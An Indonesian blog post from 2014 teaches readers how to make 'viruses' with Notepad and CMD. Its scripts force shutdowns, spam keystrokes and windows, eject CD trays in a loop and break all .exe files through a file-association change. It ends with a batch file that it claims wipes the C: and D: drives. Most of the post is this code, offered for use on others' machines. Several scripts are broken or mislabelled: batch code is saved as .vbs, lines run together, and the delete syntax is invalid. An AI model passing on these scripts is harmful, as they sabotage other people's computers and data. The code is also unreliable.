Wednesday, August 27, 2014

Cara Membuat Virus Menggunakan Notepad dan CMD

Pada sore ini kita akan share postingan tentang "Cara Membuat Virus Menggunakan Notepad dan CMD". Saya harap Anda mempraktekan pembuatan virus ini dengan bijak dan baik, misalnya buat virus untuk mengingatkan waktu sholat, seperti Virus Pray :).



Menggunakan Notepad



1. Membuat komputer/laptop menjadi shoutdown, langsung saja ini script nya ketikan ke Notepad :



@echo off

msg * I don't like you

shutdown -c "Error! You are too ******!" -s\


Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "virus.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown dengan sendirinya.
2. Cara yang ini sama dengan cara nomor 1 hanya saja yang ini  di isi dengan  waktu atau timer, langsung saja ketik kode script berikut ke notepad : 


@echo shutdown -s -t 2 -f 

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lberbeda dengan cara no 1, contoh : anonymous.bat dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no1 yaitu membuat komputer Shoutdown.hanya saja yang membedakan adalah cara yang kedua berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer ataupun laptop anda, bisa di atur sesuai keinginan (2 = 2 detik) ataupun lainnya.

3. Membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "sality.vbs" dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya..

4. Cara yang keempat sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik kode script berikut ke notepad :

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh  jail.bat dan Save As Type ganti menjadi All Files. Cara ini akan membuat notepad terbuka dengan sendirinya secara otomatis.
5. Membuat Message Virus :
MsgBox "Pesan Anda"
Simpan dengan nama sesuai keinginan Anda, tetapi harus berekstensi .vbs, contohnya virus.vbs (.vbs singkatan dari Visual Basic Scripting)
Menggunakan Command Prompt atau CMD

1. Nah selanjutnya beralih menggunakan CMD : 
 ASSOC.exe=.hank 

lalu tekan enter  ini yang membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, ataupun aplikasi lainnya.
Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik

 "ASSOC.exe=EXEFILE" 

2. Membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 

start
start
start
start
start
start
start
start
start
start
start
start
Selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh :  virus.bat  dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi error, karena akan membuka CMD yang banyak jika file virus.bat  itu di buka.

3. Membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja ketik kode script berikut ke notepad : 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : jail.vbs dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

4. Saya rasa paling berbahaya, dikarena dapat menghapus seluruh data di hardisk tanpa terkecuali,sehingga komputer harus instal ulang. langsung saja ketik kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y

Simpan dengan nama bebas dan exstensi .bat contoh  mainan.bat  dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer/laptop anda.



No comments: